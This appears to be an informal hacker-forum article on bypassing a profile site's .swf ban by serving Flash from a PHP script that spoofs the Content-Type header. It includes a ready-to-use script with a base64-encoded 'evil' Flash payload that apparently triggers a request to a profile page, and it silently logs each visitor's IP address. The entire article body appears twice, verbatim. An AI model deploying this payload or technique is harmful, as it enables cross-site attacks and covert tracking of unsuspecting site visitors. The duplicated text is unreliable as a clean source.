Main:
Fooling browser into doing things due to content type spoofing!
Often profile sites allow you to include music or an video. This however, can be an security risk when it is not properly implented. Even when all input is filtered, and with all (special character) output is encoded, we can initialize an XSS or CSRF atack using flash.
The music or video is often included in the profile with the <embed src> tag. This tag is dangerous when it is not used with the type, which set's the content type of the target source.
The content type is an indicator for a webbrowser how the downloaded content should be handled. We obiuosly dont want to get an flash file included. That's why the .swf is disallowed. This must be secure because we can't include a flash file then, or can we? The answer is that we still can. By setting a response-header the Content-Type to application/x-shockwave-flash.
So if we upload an php script that sets the header and the send's the 'evil' flash file, the game would be over.
I shall provide u with an example of such a script. It contains the flash file base encoded, because of the characters it contains are not alphanumeric.
<?php
//set headers WIEEEEJ
//a pesonel script
//usage at own risk
header('Content-Type: application/x-shockwave-flash');
$EvilCode="RldTCGwAAAAwCgCgAAwBAEQRAAAAAEMC////PwNHAAAAlg4AAHZhY2F0aW9uAAAzMAA8li0AAGh0dHA6Ly93d3cuYm9vdGxlZ2dlcnMudXMvcHJvZmlsZS5waHAAAF90b3AAmgEAAgBAAAAA";
echo base64_decode($EvilCode);
$myFile = "l0g.tXt";
$fh = fopen($myFile, 'a') ;
fwrite($fh, "^_^ |" . $_SERVER['REMOTE_ADDR'] . "| ^_^rn");
fclose($fh);
?>
I hope u enjoyed my article and that I could make it a bit clear how it works, or maybe you allready knew it ;), anyways, please rate the article.
The music or video is often included in the profile with the <embed src> tag. This tag is dangerous when it is not used with the type, which set's the content type of the target source.
The content type is an indicator for a webbrowser how the downloaded content should be handled. We obiuosly dont want to get an flash file included. That's why the .swf is disallowed. This must be secure because we can't include a flash file then, or can we? The answer is that we still can. By setting a response-header the Content-Type to application/x-shockwave-flash.
So if we upload an php script that sets the header and the send's the 'evil' flash file, the game would be over.
I shall provide u with an example of such a script. It contains the flash file base encoded, because of the characters it contains are not alphanumeric.
<?php
//set headers WIEEEEJ
//a pesonel script
//usage at own risk
header('Content-Type: application/x-shockwave-flash');
$EvilCode="RldTCGwAAAAwCgCgAAwBAEQRAAAAAEMC////PwNHAAAAlg4AAHZhY2F0aW9uAAAzMAA8li0AAGh0dHA6Ly93d3cuYm9vdGxlZ2dlcnMudXMvcHJvZmlsZS5waHAAAF90b3AAmgEAAgBAAAAA";
echo base64_decode($EvilCode);
$myFile = "l0g.tXt";
$fh = fopen($myFile, 'a') ;
fwrite($fh, "^_^ |" . $_SERVER['REMOTE_ADDR'] . "| ^_^rn");
fclose($fh);
?>
I hope u enjoyed my article and that I could make it a bit clear how it works, or maybe you allready knew it ;), anyways, please rate the article.
Posted by 
